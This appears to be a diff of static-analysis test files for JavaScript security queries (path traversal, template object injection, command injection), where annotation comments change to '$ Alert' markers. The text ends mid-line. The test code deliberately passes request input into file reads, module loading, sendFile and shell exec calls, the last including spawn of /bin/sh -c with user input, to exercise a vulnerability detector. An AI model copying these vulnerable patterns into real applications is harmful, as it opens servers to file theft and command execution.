(req, res) => { let path = pathModule.normalize(req.query.x); if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.matchAll(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.matchAll(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js index 1dac13246c6f..8d2bfe11feb7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js @@ -8,20 +8,20 @@ var http = require("http"), var server = http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK - gracefulFs.readFileSync(path); // NOT OK - fsExtra.readFileSync(path); // NOT OK - originalFs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + gracefulFs.readFileSync(path); // $ Alert + fsExtra.readFileSync(path); // $ Alert + originalFs.readFileSync(path); // $ Alert - getFsModule(true).readFileSync(path); // NOT OK - getFsModule(false).readFileSync(path); // NOT OK + getFsModule(true).readFileSync(path); // $ Alert + getFsModule(false).readFileSync(path); // $ Alert - require("./my-fs-module").require(true).readFileSync(path); // NOT OK + require("./my-fs-module").require(true).readFileSync(path); // $ Alert let flexibleModuleName = require(process.versions["electron"] ? "original-fs" : "fs"); - flexibleModuleName.readFileSync(path); // NOT OK + flexibleModuleName.readFileSync(path); // $ Alert }); function getFsModule(special) { @@ -37,9 +37,9 @@ var util = require("util"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - util.promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisifyAll(fs).readFileSync(path); // NOT OK + util.promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisifyAll(fs).readFileSync(path); // $ Alert }); @@ -48,37 +48,37 @@ const asyncFS = require("./my-async-fs-module"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK - asyncFS.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + asyncFS.readFileSync(path); // $ Alert - require("pify")(fs.readFileSync)(path); // NOT OK - require("pify")(fs).readFileSync(path); // NOT OK + require("pify")(fs.readFileSync)(path); // $ Alert + require("pify")(fs).readFileSync(path); // $ Alert - require('util.promisify')(fs.readFileSync)(path); // NOT OK + require('util.promisify')(fs.readFileSync)(path); // $ Alert - require("thenify")(fs.readFileSync)(path); // NOT OK + require("thenify")(fs.readFileSync)(path); // $ Alert const readPkg = require('read-pkg'); - var pkg = readPkg.readPackageSync({cwd: path}); // NOT OK - var pkgPromise = readPkg.readPackageAsync({cwd: path}); // NOT OK + var pkg = readPkg.readPackageSync({cwd: path}); // $ Alert + var pkgPromise = readPkg.readPackageAsync({cwd: path}); // $ Alert }); const mkdirp = require("mkdirp"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK - mkdirp(path); // NOT OK - mkdirp.sync(path); // NOT OK + fs.readFileSync(path); // $ Alert + mkdirp(path); // $ Alert + mkdirp.sync(path); // $ Alert func(path); }); function func(x) { - fs.readFileSync(x); // NOT OK + fs.readFileSync(x); // $ Alert } const fsp = require("fs/promises"); http.createServer(function(req, res) { var path = url.parse(req.url, true).query.path; - fsp.readFile(path); // NOT OK + fsp.readFile(path); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js index 7546bb2c2938..d3ee99d4974b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js @@ -4,11 +4,11 @@ const prettier = require("prettier"); const app = express(); app.get('/some/path', function (req, res) { const { p } = req.params; - prettier.resolveConfig(p).then((options) => { // NOT OK + prettier.resolveConfig(p).then((options) => { // $ Alert const formatted = prettier.format("foo", options); }); - prettier.resolveConfig("foo", {config: p}).then((options) => { // NOT OK + prettier.resolveConfig("foo", {config: p}).then((options) => { // $ Alert const formatted = prettier.format("bar", options); }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js index eebc95348ba6..fa19da302606 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js @@ -19,7 +19,7 @@ function getfileRoot(workspaceId) { } function withStatsAndETag(filepath, callback) { - fs.readFileSync(filepath); // NOT OK + fs.readFileSync(filepath); // $ Alert }; function decodeUserIdFromWorkspaceId(workspaceId) { diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js index 465b5b70b690..aaa6cfdc2407 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js @@ -5,30 +5,30 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var obj = bla ? something() : path; - fs.readFileSync(obj.sub); // NOT OK + fs.readFileSync(obj.sub); // $ Alert obj.sub = "safe"; - fs.readFileSync(obj.sub); // OK + fs.readFileSync(obj.sub); obj.sub2 = "safe"; if (random()) { - fs.readFileSync(obj.sub2); // OK + fs.readFileSync(obj.sub2); } if (random()) { obj.sub3 = "safe" } - fs.readFileSync(obj.sub3); // NOT OK + fs.readFileSync(obj.sub3); // $ Alert obj.sub4 = - fs.readFileSync(obj.sub4) ? // NOT OK - fs.readFileSync(obj.sub4) : // NOT OK - fs.readFileSync(obj.sub4); // NOT OK + fs.readFileSync(obj.sub4) ? // $ Alert + fs.readFileSync(obj.sub4) : // $ Alert + fs.readFileSync(obj.sub4); // $ Alert }); server.listen(); @@ -37,7 +37,7 @@ var nodefs = require('node:fs'); var server2 = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - nodefs.readFileSync(path); // NOT OK + nodefs.readFileSync(path); // $ Alert }); server2.listen(); @@ -46,5 +46,5 @@ const chownr = require("chownr"); var server3 = http.createServer(function (req, res) { let path = url.parse(req.url, true).query.path; - chownr(path, "someuid", "somegid", function (err) {}); // NOT OK + chownr(path, "someuid", "somegid", function (err) {}); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js index 061dec18a908..b37ebc2926ad 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js @@ -7,11 +7,11 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - res.write(fs.readFileSync(['public', path].join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(['public', path].join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps let parts = ['public', path]; parts = parts.map(x => x.toLowerCase()); - res.write(fs.readFileSync(parts.join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(parts.join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js index 49c5fa78fe8d..e18e3c7e8bb1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js @@ -8,8 +8,8 @@ var server = http.createServer(function(req, res) { }); async function doRead(pathPromise) { - fs.readFileSync(await pathPromise); // NOT OK - pathPromise.then(path => fs.readFileSync(path)); // NO TOK + fs.readFileSync(await pathPromise); // $ Alert + pathPromise.then(path => fs.readFileSync(path)); // $ Alert } server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js index 23f89c55c39f..d9c07feb26b6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js @@ -3,15 +3,14 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // BAD: loading a module based on un-sanitized query parameters - var m = require(req.param("module")); + var m = require(req.param("module")); // $ Alert - loading a module based on un-sanitized query parameters }); const resolve = require("resolve"); app.get('/some/path', function(req, res) { - var module = resolve.sync(req.param("module")); // NOT OK - resolving module based on query parameters + var module = resolve.sync(req.param("module")); // $ Alert - resolving module based on query parameters - resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // NOT OK - resolving module based on query parameters + resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // $ Alert - resolving module based on query parameters var module = res; }); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js index f4f289895a86..9a200f2a4c99 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js @@ -4,25 +4,22 @@ let path = require('path'); var app = express(); app.get('/some/path/:x', function(req, res) { - // BAD: sending a file based on un-sanitized query parameters - res.sendFile(req.param("gimme")); - // BAD: same as above - res.sendfile(req.param("gimme")); + res.sendFile(req.param("gimme")); // $ Alert - sending a file based on un-sanitized query parameters + res.sendfile(req.param("gimme")); // $ Alert - same as above - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendFile(req.param("gimme"), { root: process.cwd() }); - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendfile(req.param("gimme"), { root: process.cwd() }); - // BAD: doesn't help if user controls root - res.sendFile(req.param("file"), { root: req.param("dir") }); + res.sendFile(req.param("file"), { root: req.param("dir") }); // $ Alert - doesn't help if user controls root let homeDir = path.resolve('.'); - res.sendFile(homeDir + '/data/' + req.params.x); // OK: sendFile disallows ../ - res.sendfile('data/' + req.params.x); // OK: sendfile disallows ../ + res.sendFile(homeDir + '/data/' + req.params.x); // OK - sendFile disallows ../ + res.sendfile('data/' + req.params.x); // OK - sendfile disallows ../ - res.sendFile(path.resolve('data', req.params.x)); // NOT OK - res.sendfile(path.join('data', req.params.x)); // NOT OK + res.sendFile(path.resolve('data', req.params.x)); // $ Alert + res.sendfile(path.join('data', req.params.x)); // $ Alert res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/' diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js index 1b1e87b9a76a..d705be16b317 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js @@ -4,28 +4,28 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - fs.readFileSync(path.substring(i, j)); // OK - fs.readFileSync(path.substring(4)); // NOT OK - fs.readFileSync(path.substring(0, i)); // NOT OK - fs.readFileSync(path.substr(4)); // NOT OK - fs.readFileSync(path.slice(4)); // NOT OK + fs.readFileSync(path.substring(i, j)); + fs.readFileSync(path.substring(4)); // $ Alert + fs.readFileSync(path.substring(0, i)); // $ Alert + fs.readFileSync(path.substr(4)); // $ Alert + fs.readFileSync(path.slice(4)); // $ Alert - fs.readFileSync(path.concat(unknown)); // NOT OK - fs.readFileSync(unknown.concat(path)); // NOT OK - fs.readFileSync(unknown.concat(unknown, path)); // NOT OK + fs.readFileSync(path.concat(unknown)); // $ Alert + fs.readFileSync(unknown.concat(path)); // $ Alert + fs.readFileSync(unknown.concat(unknown, path)); // $ Alert - fs.readFileSync(path.trim()); // NOT OK - fs.readFileSync(path.toLowerCase()); // NOT OK + fs.readFileSync(path.trim()); // $ Alert + fs.readFileSync(path.toLowerCase()); // $ Alert - fs.readFileSync(path.split('/')); // OK (readFile throws an exception when the filename is an array) - fs.readFileSync(path.split('/')[0]); // OK -- for now - fs.readFileSync(path.split('/')[i]); // NOT OK - fs.readFileSync(path.split(/\//)[i]); // NOT OK - fs.readFileSync(path.split("?")[0]); // NOT OK - fs.readFileSync(path.split(unknown)[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown).whatever); // OK -- but still flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown)); // NOT OK - fs.readFileSync(path.split("?")[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] + fs.readFileSync(path.split('/')); // OK - readFile throws an exception when the filename is an array + fs.readFileSync(path.split('/')[0]); // OK - for now + fs.readFileSync(path.split('/')[i]); // $ Alert + fs.readFileSync(path.split(/\//)[i]); // $ Alert + fs.readFileSync(path.split("?")[0]); // $ Alert + fs.readFileSync(path.split(unknown)[i]); // $ MISSING: Alert + fs.readFileSync(path.split(unknown).whatever); // $ SPURIOUS: Alert + fs.readFileSync(path.split(unknown)); // $ Alert + fs.readFileSync(path.split("?")[i]); // $ MISSING: Alert }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js index 1e95cf84ec76..097bcc1fa117 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js @@ -4,5 +4,5 @@ const parseTorrent = require('parse-torrent'), function getTorrentData(dir, torrent){ let name = parseTorrent(torrent).name, loc = dir + "/" + name + ".torrent.data"; - return fs.readFileSync(loc); // NOT OK + return fs.readFileSync(loc); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts index f5fd62b2ee00..51549ea75658 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts @@ -8,27 +8,26 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list let path2 = path; - path2 ||= res.write(fs.readFileSync(path2)); // GOOD: path is falsy + path2 ||= res.write(fs.readFileSync(path2)); // OK - path is falsy let path3 = path; - path3 &&= res.write(fs.readFileSync(path3)); // BAD: path is truthy + path3 &&= res.write(fs.readFileSync(path3)); // $ Alert - path is truthy let path4 = path; - path4 ??= res.write(fs.readFileSync(path4)); // GOOD - path is null or undefined - but we don't capture that. [INCONSISTENCY] + path4 ??= res.write(fs.readFileSync(path4)); // $ SPURIOUS: Alert - path is null or undefined - but we don't capture that. let path5 = path; path5 &&= "clean"; - res.write(fs.readFileSync(path5)); // GOOD: path is either falsy or "clean"; + res.write(fs.readFileSync(path5)); // OK - path is either falsy or "clean"; let path6 = path; path6 ||= "clean"; - res.write(fs.readFileSync(path6)); // BAD: path can still be tainted + res.write(fs.readFileSync(path6)); // $ Alert - path can still be tainted }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js index 0146533c6dca..bf14b568196b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js @@ -50,6 +50,6 @@ function doZipSlip() { files.push(name); } for (const file of files) { - fs.createWriteStream(path.join(extractTo, file)); // OK + fs.createWriteStream(path.join(extractTo, file)); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js index 07918647e6f0..45e4ced8380b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js @@ -26,7 +26,7 @@ fs.createReadStream('archive.zip') } if (!fileName.startsWith(".")) { - entry.pipe(fs.createWriteStream(fileName)); // OK. + entry.pipe(fs.createWriteStream(fileName)); } }); @@ -35,5 +35,5 @@ fs.createReadStream('archive.zip') .on('entry', entry => { const fileName = path.normalize(entry.path); - entry.pipe(fs.createWriteStream(path.basename(fileName))); // OK. + entry.pipe(fs.createWriteStream(path.basename(fileName))); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/routes.js b/javascript/ql/test/query-tests/Security/CWE-073/routes.js index 2bfbad7cd37b..07e03fc0f404 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/routes.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/routes.js @@ -1,3 +1,3 @@ exports.foo = function(req, res) { - res.render('foo', req.body); // NOT OK + res.render('foo', req.body); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst.js b/javascript/ql/test/query-tests/Security/CWE-073/tst.js index ee2bff5f0e78..8b6c30c46947 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst.js @@ -7,26 +7,26 @@ app.post('/path', function(req, res) { var bodyParameter = req.body.bodyParameter; var queryParameter = req.query.queryParameter; - res.render('template', bodyParameter); // NOT OK - res.render('template', queryParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert + res.render('template', queryParameter); // $ Alert if (typeof bodyParameter === "string") { - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); } - res.render('template', queryParameter + ""); // OK + res.render('template', queryParameter + ""); - res.render('template', {profile: bodyParameter}); // OK + res.render('template', {profile: bodyParameter}); indirect(res, queryParameter); }); function indirect(res, obj) { - res.render("template", obj); // NOT OK + res.render("template", obj); // $ Alert const str = obj + ""; - res.render("template", str); // OK + res.render("template", str); - res.render("template", JSON.parse(str)); // NOT OK + res.render("template", JSON.parse(str)); // $ Alert } let routes = require('./routes'); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js index 6cb626fd7c1c..8f8b075010bf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js @@ -4,27 +4,27 @@ app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) ); app.set('view engine', '.hbs') app.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); var app2 = require('express')(); app2.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app3 = require('express')(); app3.set('view engine', 'pug'); app3.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app4 = require('express')(); app4.set('view engine', 'ejs'); app4.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); var app5 = require('express')(); @@ -32,7 +32,7 @@ app5.engine("foobar", require("consolidate").whiskers); app5.set('view engine', 'foobar'); app5.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); var app6 = require('express')(); @@ -40,7 +40,7 @@ app6.register(".html", require("consolidate").whiskers); app6.set('view engine', 'html'); app6.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); const express = require('express'); @@ -49,6 +49,6 @@ var app7 = express(); app7.set('view engine', 'ejs'); router.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert }); app7.use("/router", router); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js index 1cfea0118bc2..3f50d6d5df66 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/actions.js @@ -6,7 +6,7 @@ const { exec } = require('child_process'); function echo_title() { // get the title from the event pull request const title = github.context.payload.pull_request.title; - exec(`echo ${title}`, (err, stdout, stderr) => { // NOT OK + exec(`echo ${title}`, (err, stdout, stderr) => { // $ Alert if (err) { return; } @@ -16,7 +16,7 @@ function echo_title() { // function which passes the issue title into an exec function exec_head_ref() { const head_ref = github.context.payload.pull_request.head.ref; - aexec.exec(`echo ${head_ref}`).then((res) => { // NOT OK + aexec.exec(`echo ${head_ref}`).then((res) => { // $ Alert console.log(res); }); } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js index abc9704a48e8..ddfa7b720d02 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/child_process-test.js @@ -5,61 +5,61 @@ var cp = require("child_process"), var server = http.createServer(function(req, res) { let cmd = url.parse(req.url, true).query.path; - cp.exec("foo"); // OK - cp.execSync("foo"); // OK - cp.execFile("foo"); // OK - cp.execFileSync("foo"); // OK - cp.spawn("foo"); // OK - cp.spawnSync("foo"); // OK - cp.fork("foo"); // OK + cp.exec("foo"); + cp.execSync("foo"); + cp.execFile("foo"); + cp.execFileSync("foo"); + cp.spawn("foo"); + cp.spawnSync("foo"); + cp.fork("foo"); - cp.exec(cmd); // NOT OK - cp.execSync(cmd); // NOT OK - cp.execFile(cmd); // NOT OK - cp.execFileSync(cmd); // NOT OK - cp.spawn(cmd); // NOT OK - cp.spawnSync(cmd); // NOT OK - cp.fork(cmd); // NOT OK + cp.exec(cmd); // $ Alert + cp.execSync(cmd); // $ Alert + cp.execFile(cmd); // $ Alert + cp.execFileSync(cmd); // $ Alert + cp.spawn(cmd); // $ Alert + cp.spawnSync(cmd); // $ Alert + cp.fork(cmd); // $ Alert - cp.exec("foo" + cmd + "bar"); // NOT OK + cp.exec("foo" + cmd + "bar"); // $ Alert // These are technically NOT OK, but they are more likely as false positives - cp.exec("foo", {shell: cmd}); // OK - cp.exec("foo", {env: {PATH: cmd}}); // OK - cp.exec("foo", {cwd: cmd}); // OK - cp.exec("foo", {uid: cmd}); // OK - cp.exec("foo", {gid: cmd}); // OK + cp.exec("foo", {shell: cmd}); + cp.exec("foo", {env: {PATH: cmd}}); + cp.exec("foo", {cwd: cmd}); + cp.exec("foo", {uid: cmd}); + cp.exec("foo", {gid: cmd}); let sh, flag; if (process.platform == 'win32') sh = 'cmd.exe', flag = '/c'; else sh = '/bin/sh', flag = '-c'; - cp.spawn(sh, [ flag, cmd ]); // NOT OK + cp.spawn(sh, [ flag, cmd ]); // $ Alert let args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Alert cp.execFile("/bin/bash", args); let args = []; args[0] = "-c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Alert run("sh", args); let args = []; args[0] = `-` + "c"; - args[1] = cmd; // NOT OK + args[1] = cmd; // $ Alert cp.execFile(`/bin` + "/bash", args); - cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // NOT OK - cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // NOT OK + cp.spawn('cmd.exe', ['/C', 'foo'].concat(["bar", cmd])); // $ Alert + cp.spawn('cmd.exe', ['/C', 'foo'].concat(cmd)); // $ Alert let myArgs = []; myArgs.push(`-` + "c"); myArgs.push(cmd); - cp.execFile(`/bin` + "/bash", args); // NOT OK - but no support for `[].push()` for indirect arguments [INCONSISTENCY] + cp.execFile(`/bin` + "/bash", args); // $ MISSING: Alert - no support for `[].push()` for indirect arguments }); @@ -72,7 +72,7 @@ var util = require("util") http.createServer(function(req, res) { let cmd = url.parse(req.url, true).query.path; - util.promisify(cp.exec)(cmd); // NOT OK + util.promisify(cp.exec)(cmd); // $ Alert }); @@ -80,7 +80,7 @@ const webpackDevServer = require('webpack-dev-server'); new webpackDevServer(compiler, { before: function (app) { app.use(function (req, res, next) { - cp.exec(req.query.fileName); // NOT OK + cp.exec(req.query.fileName); // $ Alert require("my-sub-lib").foo(req.query.fileName); // calls lib/subLib/index.js#foo }); @@ -91,5 +91,5 @@ import Router from "koa-router"; const router = new Router(); router.get("/ping/:host", async (ctx) => { - cp.exec("ping " + ctx.params.host); // NOT OK + cp.exec("ping " + ctx.params.host); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js index b5b8fc602bdf..b2cfe4424039 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh.js @@ -12,7 +12,7 @@ function getShell() { function execSh(command, options) { var shell = getShell() - return cp.spawn(shell.cmd, [shell.arg, command], options) // BAD + return cp.spawn(shell.cmd, [shell.arg, command], options) // $ Alert } http.createServer(function (req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js index ad91b66f5344..9d12f22bb249 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/exec-sh2.js @@ -7,7 +7,7 @@ function getShell() { } function execSh(command, options) { - return cp.spawn(getShell(), ["-c", command], options) // BAD + return cp.spawn(getShell(), ["-c", command], options) // $ Alert }; http.createServer(function (req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js index 25e45d675d9f..1cfc40856113 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/execSeries.js @@ -11,7 +11,7 @@ function asyncEach(arr, iterator) { } function execEach(commands) { - asyncEach(commands, (command) => exec(command)); // NOT OK + asyncEach(commands, (command) => exec(command)); // $ Alert }; require('http').createServer(function(req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js index 4b1dabde4412..0efc3279cf50 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/form-parsers.js @@ -6,12 +6,12 @@ var app = express(); var exec = require("child_process").exec; app.post('/profile', upload.single('avatar'), function (req, res, next) { - exec("touch " + req.file.originalname); // NOT OK + exec("touch " + req.file.originalname); // $ Alert }); app.post('/photos/upload', upload.array('photos', 12), function (req, res, next) { req.files.forEach(file => { - exec("touch " + file.originalname); // NOT OK + exec("touch " + file.originalname); // $ Alert }) }); @@ -22,7 +22,7 @@ var Busboy = require('busboy'); http.createServer(function (req, res) { var busboy = new Busboy({ headers: req.headers }); busboy.on('file', function (fieldname, file, filename, encoding, mimetype) { - exec("touch " + filename); // NOT OK + exec("touch " + filename); // $ Alert }); req.pipe(busboy); }).listen(8000); @@ -33,12 +33,12 @@ app.post('/api/upload', (req, res, next) => { let form = formidable({ multiples: true }); form.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + exec("touch " + fields.name); // $ Alert }); let form2 = new formidable.IncomingForm(); form2.parse(req, (err, fields, files) => { - exec("touch " + fields.name); // NOT OK + 